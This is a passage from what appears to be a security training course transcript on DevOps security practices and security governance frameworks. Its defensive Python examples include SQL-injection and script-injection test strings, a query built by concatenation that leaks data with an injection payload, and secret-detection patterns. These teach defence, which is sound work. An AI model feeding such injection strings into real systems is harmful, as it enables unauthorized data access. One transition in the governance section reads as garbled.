to compromise the application, get into it, and take control.

Fixing that error at this point can cost you hundreds of thousands of dollars.
If you had done the same thing earlier, with enough internal testing driven by
continuous security, you would have been able to save that cost. Because
continuous security allows you to do security checks in different phases, you
are able to speed up development and delivery: you fix one thing and then move
to the next. This also helps with the scalability, availability, and resiliency
of the application.
[Video description begins] Continuous Security - Enablement. [Video description
ends]
So how do you enable continuous security? The first and foremost rule of thumb
is to implement smaller, gradual changes. Do not try to fix everything or
implement everything in one go; make smaller changes and implement them. Bring
in security automation tools. Manual testing is good and might catch more
errors, but the problem is that it is also prone to human error, so integrating
security automation tools is always a good thing to do. You should also enable
security alerts for security incidents, so that if the application has a
security breach, an alert notifies the security team that something has happened
and they can take quick action.

Use automation to find security loopholes. There are plenty of tools for
penetration testing and vulnerability assessment; you can use multiple
automation tools to find security loopholes. And once you find them, you have to
ensure that you fix all of them. It might be a small security loophole which you
think does not make an impact, but remember, a hacker just needs one entry point
to get into the application, and the rest he will be able to manage on his own.
Therefore, fix everything that is considered a security loophole.
[Video description begins] Continuous Security - Best Practices. [Video
description ends]
So what are the continuous security best practices? You should not use admin
logins, or logins with a lot of privileges, on the system; it is always
advisable to use a regular user account for development. You should integrate
security right from the first stage, which is planning, and you should not
exclude security at any point until the application is deployed in production.
Remember, security can never be an afterthought; it has to be integrated right
from the start. You should also enable logging, because you want to track
errors. If you do not track errors, you are going to miss them, and one error
left in the application can be very costly for the organization. The hacker
needs just one vulnerability to exploit the application and eventually take
control of it or do something with the data.

You should also focus on processes. You do not need to make all improvements at
once; make gradual improvements and ensure there are continuous improvements
happening in the application. As testing goes on and security checks happen, you
will continue to find more and more errors, and those you need to fix. So make
continuous improvements gradually. You should also keep a balance between
security and simplicity. This is a typical problem for organizations that
integrate continuous security: they tend to get carried away integrating
security, to the extent that the application loses its simplicity. You have to
strike the right balance, because at the end of the day, if the user is not able
to use your application, the application is useless. So you have to ensure the
application is simple and user friendly, while there are still enough security
checks happening to ensure data security.
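A minimal sketch of the logging practice mentioned above, assuming a hypothetical log file and event; real deployments would typically forward these records to a central log store or SIEM:

import logging

logging.basicConfig(
    filename="security.log",
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(message)s",
)

def record_failed_login(user, source_ip):
    # Logged events give the security team a trail to audit and alert on.
    logging.warning("failed login for %s from %s", user, source_ip)

record_failed_login("alice", "203.0.113.7")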
Benefits of Using DevOps
[Video description begins] Topic title: Benefits of Using DevOps. The presenter is
Ashish Chugh. [Video description ends]
Benefits of using DevOps. When you use DevOps in software development, there are
certain benefits that you gain. One is improved quality: because everybody is
tightly integrating their code into a central repository, there is improved
quality of code. You save time and money by not having to integrate code at a
later stage after everybody has been working in isolation; you save a lot of
time, and therefore a lot of cost. Because everything is centralized in DevOps,
it helps you increase maintainability; you are able to maintain your code
better. Because there are continuous releases and continuous builds happening,
it gives you a faster time to market. Developers are checking in code after
every piece gets developed.

Therefore, your application is ready in a much shorter time than in a normal
software development lifecycle. Increased reliability: because everything is
centralized and every piece of code is collated in one place, you do not have to
fear losing code from one developer or another, so the reliability of the code
is much better with the centralized repository used in DevOps. Then you have
improved scalability: you are able to scale up your application because there
are continuous builds and continuous releases, and you keep adding more
components to the application, which helps you improve its scalability. Higher
stability: because the application is continuously being built, the code is
collated in one place, and testing happens at the final stage, it brings better
stability. Increased productivity: developers do not need to keep their code
isolated; they are checking in, and there are releases happening every day or
every hour, depending on how you execute your DevOps lifecycle, which increases
productivity. You do not have to wait for one developer to finish the code and
then compile it; you can take whatever code has been checked in, build it, and
move on. Increased innovation is another benefit of DevOps. Finally, there is a
reduced development lifecycle: because there are continuous releases and
continuous builds getting checked in, the overall DevOps lifecycle becomes much
shorter. This is the reason DevOps came into existence: the typical lifecycle of
an application is much longer, but DevOps puts it on a spin and allows
application development to happen in a much shorter time.
DevOps also brings higher efficiency, better reliability, and faster updates.
Updates are faster because there are continuous releases and continuous builds,
so, for example, if you find an error, you can quickly release a new build and
update the application. Because you are able to release much faster, it also
improves the user experience: if your users see that there is a problem with the
application and you deliver a fast update, they are going to be happy. It also
reduces failures, because you are able to update the application continuously.
DevOps also integrates automation into development, so you are able to automate
a lot of things, and the development time is much shorter.

There is reduced backup complexity: because everything is stored in a
centralized repository, all you have to do is back up the code in one place.
DevOps also provides the benefit of increased infrastructure orchestration,
which can be done using tools such as Chef or Puppet. You can also perform
resource utilization monitoring: who has done how much work, who is busy, who is
not, how much data is getting fed into the centralized repository. You can
monitor all these resources and monitor your team like that. As far as software
and hardware resource utilization goes, you can see which server or platform is
busy and how much of the system resources are being used.

In the end, one of the biggest benefits of DevOps is a faster time-to-market,
because once you have the code in place in a centralized repository, you can do
one-click deployment and release the application.
Continuous Security Monitoring
[Video description begins] Topic title: Continuous Security Monitoring. The
presenter is Ashish Chugh. [Video description ends]
Security Monitoring - Traditional. In the traditional method of security
monitoring, tests were conducted only at the final stage of product development,
which meant that before the application was rolled out into production, the
security team would go and test it. The biggest drawback of this methodology was
that if there were too many security loopholes, you would either release the
application with those loopholes or halt the deployment until all of them were
fixed. Also, in the traditional way, the focus was on application development
rather than security, so the security team was only involved at the last stage.

If there are too many issues and too many bugs in the application, the
developers have to rework it at the final stage, which means halting the
application deployment. In most cases, whenever a security loophole was found,
the developers used to quickly release a patch to fix it. This was the
traditional method. However, this kind of method does not work in the long run,
because the patch might have fixed that particular vulnerability but opened
another one. Nevertheless, that has been the preferred method in traditional
security monitoring.
[Video description begins] Continuous Security Monitoring - Present. [Video
description ends]
Now let's look at how continuous security monitoring happens at present. There
is a focus on security defect metrics: you figure out how many security
loopholes have been found, how many have been fixed, how many builds have
failed, how many builds have passed, and so on. This is not an exhaustive list;
it depends from organization to organization how they define their security
defect metrics. It also gives the developers insight into how many mistakes they
are making, so it helps in both ways: the security team is able to track the
data, and developers gain insight into the number of defects they are
introducing. It also includes vulnerability assessment on a continuous basis, so
as builds get deployed, you can do vulnerability assessment at each stage.

This is to ensure that you proactively address potential security issues. In the
vulnerability assessment, when you find a security issue, you are able to deal
with it right then and there, rather than waiting for the entire build to be
complete and then rolled out. You can also define what you want to monitor. Your
focus might be only on a specific portion of the application, and you may not
want to test the entire application again, so it helps you define exactly what
to monitor. Along with that, you can have audits and control monitoring taking
place in the background. You can do regular audits and see what has been fixed
and what has not, and if something has not been fixed, why not. You can also
monitor the application that has gone live; there is continuous monitoring
happening, and you are able to see how the application is performing.
DevOps Security Best Practices
[Video description begins] Topic title: DevOps Security Best Practices. The
presenter is Ashish Chugh. [Video description ends]
DevOps security best practices. DevOps security has certain best practices that
you should follow. They are as follows. You should review code in small chunks;
never try to review a very large piece of code or the entire application in one
go. Do not make that mistake; review the code in bits and pieces so that you are
able to review it properly. You should also implement a change management
process. As changes take place in an application that is already in the
deployment stage, you do not want developers to keep adding code to it, or
adding or removing features at will.

The only thing that can help you at this stage is a change management process:
every change that needs to be made to the application should go through change
management, and only once it is approved should the developer be allowed to make
the change. Several organizations, after putting the application into
production, which is the live environment, never review it again. As per DevOps
security best practice, you should review the application on a continuous basis:
keep reviewing its code and keep running security tests to ensure that no new
security loopholes have been introduced.
[Video description begins] You should keep evaluating applications in
production. [Video description ends]
Along with owning the security best practices and guidelines, you should also
train the development team on them. For instance, if a new developer has joined
the team and he or she does not know about SQL injection, you have to ensure
that the developer understands what SQL injection is, what it does, and what
kind of harm it can cause to the application. You may not want to go into the
technicalities, but at a broad level you need to ensure the development team is
kept updated with new security norms, guidelines, and best practices. You should
also develop and implement security processes; security itself cannot run
without processes.

You need to have specific security processes in your organization and then
implement them. After the implementation, you may well have to revise the
processes, because certain things did not work as anticipated or a process was
too complicated; there could be any reason. Whatever is done, you have to ensure
that after implementation the security processes are monitored and audited. You
should also implement a DevOps-plus-security model, which is known as DevSecOps;
along with DevOps, you also include security in this model.
Later in the course, we will also look at the DevSecOps model. You should also
implement security governance; remember, governance is a must when you're
talking about security. You need to monitor and ensure everything is running as
it is supposed to run. Use DevOps security automation tools: avoid manual work
and bring automation tools into the picture, so that you can not only do the
testing but also build repeatable tests against an application. You should also
implement vulnerability assessment; this needs to be done on a frequent basis,
and whatever security loopholes are found have to be fixed. You should also
implement configuration management.

On the previous slide, we talked about building a change management process.
Change management is part of configuration management, so you need to know what
configuration you're dealing with, what changes are happening in the
application, who is authorizing them, and who is approving them; all of this
falls under configuration management. One of the key rules of thumb in DevOps
security best practices is to use the least-privilege model. Never give a
developer more privileges than required: if they do not need root or admin
access, do not give it to them; give them regular user access so that they can
work.

You should also segregate the DevOps network; we have already looked at this
point on one of the previous slides. Use privileged password management: ensure
that privileged passwords in the DevOps lifecycle are kept secure, and under no
circumstances should these passwords be shared with other users or allowed to be
compromised. You should also implement auditing and review. This needs to be
done on a continuous basis; there should be regular audits not only of the
application but also of the environment, the security processes, and the data
they collect.
Secure DevOps Lifecycle
[Video description begins] Topic title: Secure DevOps Lifecycle. The presenter is
Ashish Chugh. [Video description ends]
DevOps lifecycle: there are three teams involved in the DevOps lifecycle:
software engineering, quality assurance, and technology operations. Software
engineering is responsible for developing the software, quality assurance is
responsible for testing and quality assurance, and technology operations is
typically responsible for deploying the application.
[Video description begins] Secure DevOps Lifecycle. [Video description ends]
Now in the secure DevOps lifecycle, along with software engineering, quality
assurance, and technology operations, you add another team which is security. So
when you add security, it becomes Secure DevOps Lifecycle. So you have now
four teams, software engineering, quality assurance, technology operations, and
security. In the Secure DevOps Lifecycle, you have five different stages. You have
pre-commit, you have commit, which includes continuous integration. So even
though you do commit, then you keep on adding more and more components in the
application, or more and more code is getting merged with the existing code. Then
you have acceptance, which means continuous delivery. Deliveries happening after
every stage, after every commit, there is a continuous acceptance that is taking
place.
Then you come to the production stage, which is continuous deployment. There is
code that is getting merged in the existing code. There is acceptance happening.
And then there is continuous deployment that is taking place. And finally, you
operate the application. So let's look at each of these phases in detail. When you talk about pre-commit, you perform security assessments such as threat modeling and vulnerability assessment before the code is committed. Which means that even before the code is committed, it is evaluated through threat modeling and vulnerability assessment. When you talk about commit, there are security checks happening, which could be static code analysis or security unit tests.
There is, again, vulnerability assessment happening during automated builds. In the acceptance phase, automated security acceptance tests and functional tests are executed. Then there are infrastructure scanners and application security scanners, which scan the application and the infrastructure to ensure there are no security loopholes. Then you get to the production stage. Again, there are security checks at this time; they happen both before and after the code is deployed. In the operate phase, you continue to run monitoring and auditing of the production system, which means that even when the application is live, you are continuously monitoring it and auditing it for security loopholes.
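To illustrate what a commit-stage security unit test might look like, here is a hedged Python sketch using the standard unittest module. The validate_username function and its rules are assumptions made up for this example; the idea is only that malicious input is rejected automatically on every commit.

import re
import unittest

def validate_username(value):
    """Accept only short usernames made of letters, digits, and underscores."""
    if not re.fullmatch(r"[A-Za-z0-9_]{3,20}", value):
        raise ValueError("invalid username")
    return value

class SecurityUnitTests(unittest.TestCase):
    def test_rejects_sql_metacharacters(self):
        with self.assertRaises(ValueError):
            validate_username("admin'; DROP TABLE users;--")

    def test_rejects_script_injection(self):
        with self.assertRaises(ValueError):
            validate_username("<script>alert(1)</script>")

    def test_accepts_normal_username(self):
        self.assertEqual(validate_username("dev_user01"), "dev_user01")

if __name__ == "__main__":
    unittest.main()

Running a suite like this as part of the automated build is one way the commit stage can enforce security checks without slowing the team down.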
Mapping to the previous slide, this diagram describes the entire Secure DevOps lifecycle. You start with inception; at that stage, you do threat modeling. Then you do project configuration, where you harden the environment, which could be the operating system and the infrastructure.
[Video description begins] Project configuration +SECURED/HARDENED
ENVIRONMENTS. [Video description ends]
Then you code and you commit. At this stage, a code review happens, and it is very much a security-focused code review in which you analyze the code to find vulnerabilities that could impact the application. For instance, you might check the code for SQL injection. You would do such reviews and figure out security loopholes. Then you perform continuous integration. Along with that, you would also do continuous integration testing and automated security testing. Then you do continuous deployment.
[Video description begins] QA/INTEGRATION TESTING +ADDITIONAL
SECURITY TESTING. [Video description ends]
There are QA integration tests happening at this stage before the transition happens.
Then there is a security review of the application, which is the acceptance testing.
And finally, you transition the application into the production stage.
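Tying back to the security-focused code review mentioned above, which looks for issues such as SQL injection, the following hedged Python sketch uses the standard sqlite3 module and a made-up users table to contrast an injectable query built by string concatenation with the parameterized query a reviewer would expect to see.

import sqlite3

# In-memory database with a made-up users table, purely for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'developer')")

user_input = "alice' OR '1'='1"

# Anti-pattern a code review should flag: user input concatenated into SQL.
injectable = "SELECT role FROM users WHERE name = '" + user_input + "'"
print("Concatenated query returns:", conn.execute(injectable).fetchall())  # leaks every row

# Safer pattern: a parameterized query treats the input as data, not SQL.
safe = "SELECT role FROM users WHERE name = ?"
print("Parameterized query returns:", conn.execute(safe, (user_input,)).fetchall())  # no rows

conn.close()

Spotting the first pattern and requiring the second is exactly the kind of finding a security-focused review or static analysis step is meant to produce.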
DevOps Security Risks
[Video description begins] Topic title: DevOps Security Risks. The presenter is
Ashish Chugh. [Video description ends]
DevOps security risks. Even though DevOps is a good concept and a lot of organizations are using it, there are certain security risks associated with it. For instance, there are no fixed access management specifications defined. The DevOps concept does not have any kind of specific access management specification, so every organization tends to use its own access management specifications, which could be good or bad. Therefore, the lack of access management specifications can be a big risk in the DevOps life cycle. The attack surface is much larger in the DevOps scenario. This is because there is no integration with security; the entire concept of testing the application at each stage is missing.
For example, you are doing continuous commits. You do not know what kind of code is being committed into the existing code. Therefore, if the new piece of code has security issues, it can bring down the entire application. Privileged accounts and logins are stored in a central repository. This happens because the platforms that let multiple users work in a single place, committing, checking out, and checking in code, keep the privileged accounts and logins in a centralized repository. You have to log into the platform to check in code at the central repository, so the privileged credentials end up stored alongside it.
Now, if this central repository is compromised, you lose your privileged accounts and logins. Take the example of Git: if you're doing regular commits and Git gets compromised, you can end up losing all your code, because your login gets compromised along with it. Automation and orchestration tools can be a security risk. Because there is no security check happening at any given point of time in DevOps, automation tools can actually cause risk. You do not know what is being tested, what is being deployed, or what is being developed using automation tools. Therefore, security risks can be introduced at any given point of time. There is no strict adherence to the organizational security policy.
Now, this is one of the key risks when you talk about DevOps security. The entire DevOps life cycle moves at a very fast pace. Even if you have an organizational security policy, it is not necessarily the case that the DevOps team is going to stick to it. This is because they have a mandate to roll out the application at a very fast pace using the DevOps life cycle practices. Therefore, they may not stick to the organizational security policy or the norms that have been defined by the organization, and this becomes a big risk. Then you talk about code scanning and configuration checking. Since the DevOps life cycle moves at a very fast pace and is much shorter than the typical software development life cycle, code scanning and configuration checking can be skipped, which is one of the critical mistakes that can be made in the DevOps life cycle.
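As a concrete example of the kind of lightweight code scanning that tends to get skipped, here is a hedged Python sketch that searches source files for a few common secret patterns. The patterns and the .py file filter are illustrative assumptions; a real pipeline would use a dedicated scanner with a far larger rule set.

import pathlib
import re

# Illustrative patterns only; real scanners ship much more comprehensive rules.
SUSPICIOUS_PATTERNS = {
    "hardcoded password": re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.IGNORECASE),
    "AWS-style access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private key header": re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"),
}

def scan_repository(root="."):
    """Return (file, line number, finding) tuples for suspicious lines in .py files."""
    findings = []
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            lines = path.read_text(errors="ignore").splitlines()
        except OSError:
            continue  # skip unreadable files
        for number, line in enumerate(lines, start=1):
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append((str(path), number, label))
    return findings

if __name__ == "__main__":
    for file_name, line_number, label in scan_repository():
        print(file_name + ":" + str(line_number) + ": possible " + label)

Even a simple check like this, run before each commit, catches mistakes that a fast-moving DevOps team would otherwise push straight into the shared repository.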
Then you move to continuous development and delivery. Remember, in the DevOps life cycle, there is nothing that is being checked. You are continuously developing and continuously checking in code, and therefore there is no security check happening at any stage. The reason for skipping the code scanning and configuration checking is that the DevOps team considers security a barrier. They do not want security checks to happen at every stage; if they did that, the entire DevOps life cycle would become much longer, which the DevOps teams do not agree to. Another issue that also takes place is that developers use unknown, self-signed, and wildcard certificates. All three can cause issues in the application rollout. Most of the platforms in which you develop and deploy an application allow you to create self-signed certificates.
Now, that is not something that you should deploy a live application with. Similarly, a wildcard certificate is issued for an entire domain. So you could have something like *.microsoft.com, which is a wildcard certificate for the entire domain; this can also be a security risk. Then you come to excessive privileges and shared secrets. Because the DevOps team works very closely, they often tend to share excessive privileges, or they share their passwords and secrets with other team members, which can also be a risk. Such information can be misused by one of the team members. Now, as we have discussed earlier, DevOps development happens at a very fast pace. Therefore, it is quite likely that vulnerabilities are introduced during development. One of the last DevOps security risks is that malware can be inserted through continuous integration or continuous deployment tools, such as Chef. So you need to be very careful. A piece of code can be inserted into the existing code, and then the entire application becomes vulnerable.
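One simple safeguard against tampered build artifacts, offered here only as an illustration rather than something the course prescribes, is to compare a release artifact's SHA-256 digest against a known-good value recorded when the artifact was produced. The file name and expected digest below are placeholders.

import hashlib
import sys

def sha256_of(path):
    """Compute the SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path, expected_digest):
    """Return True only if the artifact matches the digest recorded at build time."""
    return sha256_of(path) == expected_digest.lower()

if __name__ == "__main__":
    # Placeholder values; in practice the expected digest comes from a trusted record.
    artifact, expected = "app-release.tar.gz", "<expected sha-256 digest>"
    try:
        ok = verify_artifact(artifact, expected)
    except FileNotFoundError:
        sys.exit("Artifact " + artifact + " not found; nothing to verify.")
    if not ok:
        sys.exit("Artifact digest mismatch: refusing to deploy.")
    print("Artifact integrity verified.")

If a continuous integration or deployment tool were to insert unexpected code, the digest of the artifact would no longer match the recorded value and the deployment step would stop.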
Tools for DevOps Testing
DevOps Lifecycle. The DevOps lifecycle begins with planning.
[Video description begins] Topic title: Tools for DevOps Testing. The presenter is
Ashish Chugh. [Video description ends]
You plan the project, then you code, which means you program the application that you defined in the planning stage. Then you build and test the application, you deploy the application, which is considered to be a release, and then you operate and monitor it. This completes the entire DevOps lifecycle.
[Video description begins] Tools for DevOps Testing. [Video description ends]
There are certain tools for DevOps testing. At each stage of DevOps, you will use
certain types of tools. So for instance, in planning you can use any project
management application. For instance, you could also use Microsoft Project to plan
out your project. There will be certain stages, and there will be resources aligned to tasks and stages, and accordingly you can do the planning. When you get to the coding stage, there are tools like Confluence, Jira, Git, and Eclipse. In the build stage, you have sbt, Maven, and Gradle. In the test stage, you have Selenium and JUnit. In the release stage, you have Jenkins, Codeship, and Bamboo. At the
deploy stage you will use tools like DC/OS, Docker, AWS, Puppet, SaltStack. At
the operate stage you will use tools like Chef, Ansible, Kubernetes, Mantis. At the
monitor stage you can use applications like Nagios, Splunk, Datadog, Sensu, and
New Relic.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify continual infrastructure testing and to learn how it plays a key role in DevOps development. We did this by covering the concept of continuous security practices, the importance of continuous security, key components of DevOps, security risks in DevOps, and DevOps tools. In our next course, we will move on to explore security governance and its importance.
Information Security: Security Governance
In this 9-video course, learners will discover the importance of implementing
security governance in an organization. Explore differences between security
governance and security management, types of governance frameworks, and the
roles of senior management. Also covered are ensuring good IT security
governance, risks and opportunities, security governance programs, and governance
framework structure. Key concepts covered in this course include how to
distinguish between security governance and security management; learning about
different types of IT governance frameworks including ISO 27001, PCI DSS,
HIPAA (Health Insurance Portability and Accountability Act), ITIL, and COBIT;
and learning the various roles and responsibilities of senior management in
governance; learn the measures used to ensure good IT security governance
including creating governance within an organization, delivering governance
through the right stakeholders. Next, observe how to review governance on a
periodic basis; learn the risks and opportunities in security governance and making
sure the security policies are up to date; and examine the process of rolling out a
security governance program. Finally, you will examine the structure of a
governance framework.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh. He is an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT
infrastructure operations, software development, cybersecurity, and e-learning. In
the past, I've worked in different capacities in the IT industry. I've worked as a
quality assurance team leader, technical specialist, IT operations manager, and
delivery head for software development. Along with this, I've also worked as a cybersecurity consultant. I have a Bachelor's degree in Psychology and a diploma in System Management. My areas of expertise are IT operations and process management.
I have various certifications which are Certified Network Defender, Certified
Ethical Hacker, Computer Hacking Forensic Investigator. Other than these
certifications, I also have a few certifications from Microsoft, which are MCSC,
MCSA, and MCP. I'm also a certified Lotus professional. In this course, we will understand what security governance is. We will also learn about the role of security governance in enterprise security. Then, this course will also cover different types of governance. And one of the critical things that this course will cover is the role of senior management in security governance. Later on in the
course, we will also learn about different types of security governance programs,
and the tools and controls to enforce security governance.
Governance and Management Comparison
[Video description begins] Topic title: Governance and Management Comparison.
The presenter is Ashish Chugh. [Video description ends]
Security governance is the method by which an organization directs and controls its IT security. The fundamental goal of security governance is to ensure that the security strategies of the organization are aligned with the business objectives, mission, and vision. Security governance also ensures that the security strategies are consistent with regulations, laws, and compliance programs. There are two roles that security governance has to play. One, it defines the accountability framework. Two, it provides oversight to ensure that risks are adequately mitigated. Let's now define what security governance is.
Security governance is a subset of the enterprise governance, and it is critical to
your organization. It provides a strategic direction that ensures that the
organization's objectives are achieved, risks are managed properly, and
organizational resources are used responsibly. Security governance has to be aligned properly with IT governance, otherwise neither of them can work. Security governance consists of some key components, which include the senior management, that is, the leadership of the organization, the organizational structure, and its processes. All these things are required for security governance to be implemented and work properly. Information security governance is also the responsibility of the board members and the senior management, which includes senior executives like the CEO, CTO, and CSO. The security governance program should be embedded as a part of the organization's overall governance program and integrated with it. Let's look at how security governance
and CIA triad work together. CIA triad has three key components, confidentiality,
integrity, and availability. When you talk about confidentiality in information security, it means that information should only be accessible to authorized persons and kept secret from unauthorized access, which simply means that it is available on a need-to-know basis. If you are not entitled to know it, you will not have access to the information. It is one of the most important goals in information security. Then we come to integrity, which implies ensuring the accuracy, reliability, and completeness of information and information systems. It also protects them from any kind of unauthorized alteration, modification, or attack. The third component in the CIA triad is availability, which refers to providing authorized individuals legitimate access to the information as and when required.
Availability also ensures that the information is created or stored and can be made
available to the authorized users or systems whenever they need it. So what is the
need for security governance? Why would security governance be put in place in an
organization? So it helps you fulfill the following goals. It helps you bring together
business goals and vision. So for instance, if you have a business goal that does not
align with the security strategy of the organization then both will work in different
directions. So security governance brings them together, and ensures that the
security strategy and the business goal and vision are knitted together, and they
work together. Security governance also brings in a lot of best practices. Which means, if you use a security governance framework, you can implement it in your organization, and the framework will carry the best practices that are available in the market today. So you do not have to reinvent the wheel and recreate everything. If you recreated everything yourself, you could end up with some bad practices during implementation; but if you use a security governance framework, you bring in the best practices instead. It also helps you bring together the technical requirements.
Technical requirements, in most cases, are not understood by the senior management or by non-technical people. So security governance helps you bring that together and ensures that the technical requirements are understood and implemented properly. Last but not the least, it also helps you meet the
regulatory and legal requirements. So for instance, if you are into the payment card
industry, then you would use a security governance framework, which will help
you meet the regulatory and the legal requirements, without which you might end
up getting into legal trouble. Therefore, you need something that can help you
bridge that gap. Security governance with the help of a security governance
framework can bridge that gap. Let's now look at the outcomes of the security
governance. So first of all, you have the strategic alignment.
Security governance helps you align information security with the organizational objectives. Then comes resource management. It helps you use the organizational resources more effectively and efficiently. Then comes value delivery. It helps you optimize the security costs and investments. That means you do not unnecessarily go and buy a lot of security hardware and software which do not add value to the existing network architecture. So security governance keeps a watch over this and helps you ensure that you optimize the security costs. Then
comes the business process assurance, which helps you integrate all relevant
assurance processes to maximize the effectiveness and efficiency of security
activities. After that comes performance management, which is used for
defining, reporting, and using information security governance metrics. It also
helps you in monitoring and reporting on security processes to ensure that the
business objectives are achieved. Then you have another outcome, which is risk
management. Which helps you identify, manage, and mitigate risks. Only looks at,
how do I mitigate risk?
[Video description begins] Security Governance and Security Management. [Video
description ends]
What security control should I put in place to mitigate that particular risk?
[Video description begins] The Security Management takes a decision of "How to
mitigate risks?". [Video description ends]
Security governance, on the other hand, decides who's authorized to take a decision. So, it could be your Chief Information Security Officer who is authorized to decide, "How do I mitigate that risk?" Now about security controls. Security management only looks after the implementation of security controls. Their job is to ensure security controls are appropriately placed and implemented so that the risks are mitigated. Security governance, on the other hand, does not worry about the implementation of security controls; it is only concerned with whether the risks are mitigated or not. Then come the security strategies. Security management only makes suggestions or recommendations about the security strategies. Security governance, on the other hand, has a very key role to play in the security strategy: it ensures that it is aligned with the business objectives.
As far as policies are concerned, security management only enforces the policies.
Security governance ensures that the policies are enforced. Now, the mode in which
security management works is responsibility. It is their responsibility to ensure
risks are mitigated. On the other hand, security governance has the accountability.
This means that they are accountable for ensuring that the risks are mitigated. There are a few more fundamental differences between security governance and security management.
[Video description begins] Security Governance and Security Management. [Video
description ends]
When you talk about planning, security management only works at the project
level. Security governance, on the other hand, works at the strategy level. So they
have to ensure that the security strategy meets the business goals and the visions.
As far as resources are concerned, security management does the allocation of the
resources. So for instance, who's going to do what? But, security governance
ensures that there is a proper utilization of the resources. So that is what their
responsibility is. Now when you come to the business vision, security management
has the responsibility to implement policies that align with the business vision.
Security governance, on the other hand, takes the business vision and translates it into policies, which are then implemented by the security management team. So
what are the fundamental elements of security governance?
[Video description begins] Security Governance Elements. [Video description
ends]
There are three core elements. The first one is governance principles; these are the principles by which all IT initiatives are governed. The second one is governance structure; this includes the roles and responsibilities of the major stakeholders in the IT governance decision-making process, and it includes committees and organizational elements at the branch level. The third one is governance process, which reviews, assesses, and approves or rejects any new IT initiatives. Let's now look at the importance of security governance. The first point is alignment and responsiveness. Security governance ensures the security strategy is aligned to the business objectives and mission. It also helps you in objective decision-making rather than taking ad hoc decisions. Security governance helps you come up with objective-based decisioning, so that you can make the right decision. It also helps you in organizational risk management, because you put appropriate processes in place and those processes are monitored on a regular basis. Therefore, a proper channel gets created, and everything from defining the risks to mitigating them becomes part of the organizational risk management program. It also helps you in execution and enforcement. Not only are you able to execute the policies and implement them with the security management team, but you are also able to enforce them. That is what you have to do: you have to ensure that the policies are enforced properly.
Now, there is a team that becomes accountable for the security governance. And
this is typically the top leadership that is accountable for the security governance
program. Let's now look at some of the benefits of the security governance
program. So you have increased market value. If you adopt one of the security governance frameworks, customers will have better trust in you, and therefore you can generate more business. Organizations that have a security compliance framework implemented are likely to get more business from the market. Therefore, they increase their market value. Take an example from your own experience: would you want to buy something which is unbranded, which does not have any stamp on the product that says, "This is quality checked and quality approved"? No, you would not want to buy that product. Instead, you would go and buy a product which has a quality check and which ensures that the quality of the product is appropriate and good.
Similarly, a lot of organizations get business because they showcase their security compliance program. It could be something like PCI DSS or ISO 27001, or it could be an internal security compliance effort that they have done. The more security they have implemented and the better aligned they are with security compliance, the more business they are likely to generate. It also lowers the security risks, because in security governance you have already deployed the risk management program. You are already defining what the risks are, you are able to categorize your assets, and you know what assets to protect. Therefore, the risks are lower in comparison to an organization which does not follow this process. You have protection from legal liabilities. Let's take the example of PCI DSS. If you are in the credit card industry and you do not comply with the PCI DSS standard, then you're in for legal liabilities. But if you adopt that program and you have been successfully compliant against PCI DSS, then chances are there are going to be no legal liabilities. So the risks are reduced to a bare minimum or an acceptable level. Now assume that you do not comply with the standard: if a hacker steals your data, which is customer data, your organization can be at big risk, which means a customer can actually file a lawsuit against your organization.
Another benefit is reduced operational cost because security governance helps you
in resource management and performance management. Therefore, you lower your
operational cost.
There are predictable outcomes, and you know what risk can cause what kind of damage, so you are well prepared for that. You save costs by not repeating the same tasks again and again; instead, you can optimize your resources and the work they need to do in order to save operational costs. You also have better accountability as a benefit. Different individuals have different responsibilities within an organization, so you can assign different sets of responsibilities to individuals to safeguard the information. For instance, think of an organization that does not have security governance implemented. For a user, safeguarding the information is the responsibility of either the IT team or the security team; the user does not take any responsibility. With security governance in place, the user is made aware that he or she is responsible for the information they are handling. Therefore, each individual has a certain set of responsibilities to safeguard the information.
Types of IT Governance Frameworks
[Video description begins] Topic title: Types of IT Governance Frameworks. The
presenter is Ashish Chugh. [Video description ends]
There are different types of IT governance frameworks that are available. It is
important to know that not all IT governance frameworks will fit every
organization. Depending on the nature of work that your organization does, you
will have to adopt the appropriate IT governance framework. Going forward, we
will look at some of the key IT governance frameworks that are available today. To
start with there is ISO 27001. Then comes the PCI DSS, then HIPAA, ITIL, and
COBIT. An organization need not implement all these IT governance frameworks.
For instance, an organization which does credit card processing work will only need to adopt PCI DSS. Going forward, we'll be looking at each one of these IT
governance frameworks in detail. ISO 27001 helps you define an Information
Security Management System, which is known as ISMS, to bring information
security under management control. It helps you maintain a balance between
physical, procedural, technical, and personnel security.
[Video description begins] ISO 27001. [Video description ends]
There are controls defined in ISO 27001 that serve as a guideline and that cater to different control types such as technical, logical, and physical. For example, a few controls in ISO 27001 focus on physical security, whereas other controls help you in the technical implementation. ISO 27001 contains 114 controls in 14 clauses and 35 control categories. ISO 27001 helps you reduce and control IT risks. What you have to understand is that the implementation of ISO 27001 is not a one-time activity. You first start with establishing, implementing, and maintaining, and finally move into the continual improvement phase. Because you are continuously looking at your IT infrastructure and the risks and security controls that you've implemented, it lowers the IT risks. Because you're in the continuous
improvement phase, it also helps you reduce the chances of security breaches.
Remember, your business is not going to be static. It will evolve. And therefore the
security controls that you have implemented to prevent security breaches, they will
also have to evolve along with the business. Now if you do that, with the
continuous improvement program in the ISO 27001, you will reduce the chances of
security breaches. This is because your security controls are always updated.
You always find out what are the security risks and control them with appropriate
security controls. Therefore, the chances of security breaches reduce. And, because
you are able to reduce the number of security breaches, you are able to retain the
information confidentiality. ISO 27001 also helps you lower the cost by reducing
the chances of threat, as well as aligning IT with the business processes and
strategic decisions. Now, because everything is aligned with business processes and
strategic decisioning, then there are less chances that you're going to end up
